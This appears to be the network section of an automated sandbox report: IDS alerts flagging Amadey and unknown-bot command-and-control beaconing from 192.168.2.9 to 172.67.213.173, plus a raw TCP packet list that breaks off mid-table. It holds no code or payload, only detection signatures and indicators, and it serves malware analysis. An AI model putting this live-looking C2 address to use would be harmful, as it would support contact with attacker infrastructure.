2024-10-31T14:25:47.403495+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	49975	172.67.213.173	80	TCP
2024-10-31T14:25:49.964778+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	49987	172.67.213.173	80	TCP
2024-10-31T14:25:52.486086+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	49988	172.67.213.173	80	TCP
2024-10-31T14:25:55.004933+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	49989	172.67.213.173	80	TCP
2024-10-31T14:25:55.832788+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.9	49990	TCP
2024-10-31T14:25:57.394572+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	49991	172.67.213.173	80	TCP
2024-10-31T14:25:59.923064+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	49992	172.67.213.173	80	TCP
2024-10-31T14:26:02.314368+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	49993	172.67.213.173	80	TCP
2024-10-31T14:26:04.816947+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	49994	172.67.213.173	80	TCP
2024-10-31T14:26:07.225159+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	49995	172.67.213.173	80	TCP
2024-10-31T14:26:09.717993+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	49996	172.67.213.173	80	TCP
2024-10-31T14:26:12.105745+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	49997	172.67.213.173	80	TCP
2024-10-31T14:26:14.590623+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	49998	172.67.213.173	80	TCP
2024-10-31T14:26:17.158031+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	49999	172.67.213.173	80	TCP
2024-10-31T14:26:19.728567+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	50000	172.67.213.173	80	TCP
2024-10-31T14:26:22.152809+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	50001	172.67.213.173	80	TCP
2024-10-31T14:26:24.678101+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	50002	172.67.213.173	80	TCP
2024-10-31T14:26:27.099760+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	50003	172.67.213.173	80	TCP
2024-10-31T14:26:29.635646+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	50004	172.67.213.173	80	TCP
2024-10-31T14:26:32.108410+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	50005	172.67.213.173	80	TCP
2024-10-31T14:26:34.627410+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	50006	172.67.213.173	80	TCP
2024-10-31T14:26:37.057362+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	50007	172.67.213.173	80	TCP
2024-10-31T14:26:39.610237+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	50008	172.67.213.173	80	TCP
2024-10-31T14:26:42.002816+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	50009	172.67.213.173	80	TCP
2024-10-31T14:26:44.584818+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	50010	172.67.213.173	80	TCP
2024-10-31T14:26:46.990327+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	50011	172.67.213.173	80	TCP
2024-10-31T14:26:49.516602+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	50012	172.67.213.173	80	TCP
2024-10-31T14:26:51.935172+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	50013	172.67.213.173	80	TCP
2024-10-31T14:26:54.439609+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	50014	172.67.213.173	80	TCP
2024-10-31T14:26:56.940098+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	50015	172.67.213.173	80	TCP
2024-10-31T14:26:59.340883+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	50016	172.67.213.173	80	TCP
2024-10-31T14:27:01.600269+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	50017	172.67.213.173	80	TCP
2024-10-31T14:27:04.183234+0100	2856097	ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)	1	192.168.2.9	50018	172.67.213.173	80	TCP
2024-10-31T14:27:06.558317+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.9	50019	172.67.213.173	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 14:25:34.236412048 CET	49903	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:34.241323948 CET	80	49903	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:34.241509914 CET	49903	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:34.241723061 CET	49903	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:34.246669054 CET	80	49903	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:35.128082991 CET	80	49903	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:35.128154039 CET	49903	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:36.640705109 CET	49903	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:36.641011953 CET	49916	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:36.645987988 CET	80	49916	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:36.646136045 CET	49916	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:36.646187067 CET	80	49903	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:36.646239042 CET	49903	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:36.647644997 CET	49916	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:36.652494907 CET	80	49916	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:37.559220076 CET	80	49916	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:37.559392929 CET	49916	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:39.197101116 CET	49916	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:39.197402000 CET	49930	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:39.202455997 CET	80	49916	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:39.202508926 CET	49916	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:39.202548981 CET	80	49930	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:39.202615023 CET	49930	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:39.202775955 CET	49930	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:39.207724094 CET	80	49930	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:40.089376926 CET	80	49930	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:40.089539051 CET	49930	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:41.591605902 CET	49930	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:41.591917038 CET	49946	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:41.597160101 CET	80	49930	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:41.597235918 CET	49930	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:41.597388983 CET	80	49946	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:41.597467899 CET	49946	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:41.597575903 CET	49946	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:41.602972984 CET	80	49946	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:42.510982037 CET	80	49946	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:42.511086941 CET	49946	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:44.139892101 CET	49946	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:44.140166998 CET	49962	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:44.145895958 CET	80	49962	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:44.146508932 CET	80	49946	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:44.146589041 CET	49946	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:44.146604061 CET	49962	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:44.146783113 CET	49962	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:44.151736021 CET	80	49962	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:45.008002996 CET	80	49962	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:45.009460926 CET	49962	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:46.515228033 CET	49962	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:46.515518904 CET	49975	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:46.520673990 CET	80	49962	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:46.520723104 CET	49962	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:46.521390915 CET	80	49975	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:46.521572113 CET	49975	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:46.521676064 CET	49975	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:46.526755095 CET	80	49975	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:47.403352022 CET	80	49975	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:47.403369904 CET	80	49975	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:47.403495073 CET	49975	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:49.031708002 CET	49975	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:49.031981945 CET	49987	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:49.036884069 CET	80	49987	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:49.036956072 CET	49987	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:49.037020922 CET	80	49975	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:49.037102938 CET	49975	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:49.037106991 CET	49987	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:49.041866064 CET	80	49987	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:49.964687109 CET	80	49987	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:49.964777946 CET	49987	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:51.466712952 CET	49987	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:51.467061043 CET	49988	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:51.621268034 CET	80	49988	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:51.621407986 CET	49988	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:51.621587038 CET	49988	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:51.621613026 CET	80	49987	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:51.621676922 CET	49987	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:51.626372099 CET	80	49988	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:52.485980034 CET	80	49988	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:52.486085892 CET	49988	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:54.150373936 CET	49988	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:54.150691032 CET	49989	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:54.155752897 CET	80	49988	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:54.155776024 CET	80	49989	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:54.155832052 CET	49988	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:54.155873060 CET	49989	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:54.164885044 CET	49989	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:54.169761896 CET	80	49989	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:55.004777908 CET	80	49989	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:55.004933119 CET	49989	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:56.514595985 CET	49989	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:56.514925003 CET	49991	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:56.519783020 CET	80	49991	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:56.519855976 CET	49991	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:56.520003080 CET	49991	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:56.520193100 CET	80	49989	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:56.520245075 CET	49989	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:56.524787903 CET	80	49991	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:57.394423962 CET	80	49991	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:57.394572020 CET	49991	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:59.015856028 CET	49991	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:59.016259909 CET	49992	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:59.021770954 CET	80	49991	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:59.021785975 CET	80	49992	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:59.021909952 CET	49991	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:59.021992922 CET	49992	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:59.022228003 CET	49992	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:25:59.027463913 CET	80	49992	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:59.922946930 CET	80	49992	172.67.213.173	192.168.2.9
Oct 31, 2024 14:25:59.923063993 CET	49992	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:01.436777115 CET	49992	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:01.437068939 CET	49993	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:01.442250013 CET	80	49993	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:01.442331076 CET	49993	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:01.442446947 CET	49993	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:01.442811966 CET	80	49992	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:01.442873955 CET	49992	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:01.447437048 CET	80	49993	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:02.314182997 CET	80	49993	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:02.314368010 CET	49993	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:03.947705030 CET	49993	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:03.948127031 CET	49994	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:03.954138994 CET	80	49994	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:03.954221964 CET	49994	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:03.954351902 CET	80	49993	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:03.954372883 CET	49994	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:03.954412937 CET	49993	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:03.959883928 CET	80	49994	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:04.816848993 CET	80	49994	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:04.816946983 CET	49994	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:06.327600956 CET	49994	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:06.327923059 CET	49995	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:06.332730055 CET	80	49995	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:06.332847118 CET	80	49994	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:06.332901001 CET	49995	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:06.332909107 CET	49994	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:06.333141088 CET	49995	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:06.337946892 CET	80	49995	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:07.225070000 CET	80	49995	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:07.225158930 CET	49995	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:08.843626022 CET	49995	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:08.843939066 CET	49996	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:08.849817038 CET	80	49996	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:08.849833965 CET	80	49995	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:08.849885941 CET	49996	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:08.849915028 CET	49995	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:08.850112915 CET	49996	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:08.856162071 CET	80	49996	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:09.717773914 CET	80	49996	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:09.717993021 CET	49996	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:11.233972073 CET	49996	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:11.234162092 CET	49997	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:11.239088058 CET	80	49997	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:11.239187002 CET	49997	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:11.239394903 CET	49997	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:11.239723921 CET	80	49996	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:11.239779949 CET	49996	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:11.244278908 CET	80	49997	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:12.105653048 CET	80	49997	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:12.105745077 CET	49997	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:13.734071016 CET	49997	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:13.734416008 CET	49998	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:13.739361048 CET	80	49998	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:13.739470005 CET	49998	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:13.739478111 CET	80	49997	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:13.739552021 CET	49997	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:13.739603043 CET	49998	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:13.744585037 CET	80	49998	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:14.590442896 CET	80	49998	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:14.590622902 CET	49998	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:16.248765945 CET	49998	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:16.249046087 CET	49999	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:16.253856897 CET	80	49999	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:16.254039049 CET	49999	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:16.254049063 CET	80	49998	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:16.254087925 CET	49998	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:16.256545067 CET	49999	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:16.261548996 CET	80	49999	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:17.157974958 CET	80	49999	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:17.158030987 CET	49999	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:18.847446918 CET	49999	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:18.847762108 CET	50000	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:18.852603912 CET	80	50000	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:18.852653980 CET	80	49999	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:18.852668047 CET	50000	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:18.852714062 CET	49999	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:18.852936983 CET	50000	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:18.857682943 CET	80	50000	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:19.728466988 CET	80	50000	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:19.728566885 CET	50000	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:21.233386993 CET	50000	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:21.233697891 CET	50001	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:21.238544941 CET	80	50001	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:21.238634109 CET	50001	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:21.238676071 CET	80	50000	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:21.238738060 CET	50000	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:21.238836050 CET	50001	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:21.243582964 CET	80	50001	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:22.152596951 CET	80	50001	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:22.152808905 CET	50001	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:22.152916908 CET	80	50001	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:22.152966976 CET	50001	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:23.780652046 CET	50001	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:23.781099081 CET	50002	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:23.786176920 CET	80	50001	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:23.786190987 CET	80	50002	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:23.786292076 CET	50001	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:23.786464930 CET	50002	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:23.786540031 CET	50002	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:23.791692972 CET	80	50002	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:24.677872896 CET	80	50002	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:24.678101063 CET	50002	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:26.186865091 CET	50002	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:26.187186956 CET	50003	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:26.222309113 CET	80	50003	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:26.222388029 CET	50003	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:26.222580910 CET	50003	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:26.222744942 CET	80	50002	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:26.222807884 CET	50002	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:26.227529049 CET	80	50003	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:27.099616051 CET	80	50003	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:27.099760056 CET	50003	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:28.763053894 CET	50003	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:28.763477087 CET	50004	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:28.768666983 CET	80	50003	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:28.768731117 CET	50003	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:28.768846035 CET	80	50004	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:28.768920898 CET	50004	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:28.769045115 CET	50004	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:28.773973942 CET	80	50004	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:29.635559082 CET	80	50004	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:29.635613918 CET	80	50004	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:29.635646105 CET	50004	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:29.635689020 CET	50004	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:31.208056927 CET	50004	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:31.211977005 CET	50005	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:31.213557005 CET	80	50004	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:31.213691950 CET	50004	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:31.216967106 CET	80	50005	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:31.217051983 CET	50005	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:31.219444990 CET	50005	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:31.224261045 CET	80	50005	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:32.108320951 CET	80	50005	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:32.108341932 CET	80	50005	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:32.108409882 CET	50005	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:33.732417107 CET	50005	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:33.732722044 CET	50006	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:33.737555027 CET	80	50006	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:33.737628937 CET	50006	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:33.737716913 CET	50006	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:33.737762928 CET	80	50005	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:33.737812996 CET	50005	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:33.742634058 CET	80	50006	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:34.627324104 CET	80	50006	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:34.627351999 CET	80	50006	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:34.627409935 CET	50006	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:34.627435923 CET	50006	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:36.147332907 CET	50006	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:36.147622108 CET	50007	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:36.152514935 CET	80	50007	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:36.152586937 CET	50007	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:36.152740002 CET	50007	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:36.153157949 CET	80	50006	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:36.153208017 CET	50006	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:36.157479048 CET	80	50007	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:37.057300091 CET	80	50007	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:37.057357073 CET	80	50007	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:37.057362080 CET	50007	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:37.057394981 CET	50007	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:38.687431097 CET	50007	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:38.687736034 CET	50008	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:38.693439960 CET	80	50008	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:38.693543911 CET	50008	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:38.693710089 CET	80	50007	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:38.693758011 CET	50008	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:38.693779945 CET	50007	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:38.700465918 CET	80	50008	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:39.610028028 CET	80	50008	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:39.610236883 CET	50008	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:41.125329018 CET	50008	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:41.125663996 CET	50009	80	192.168.2.9	172.67.213.173
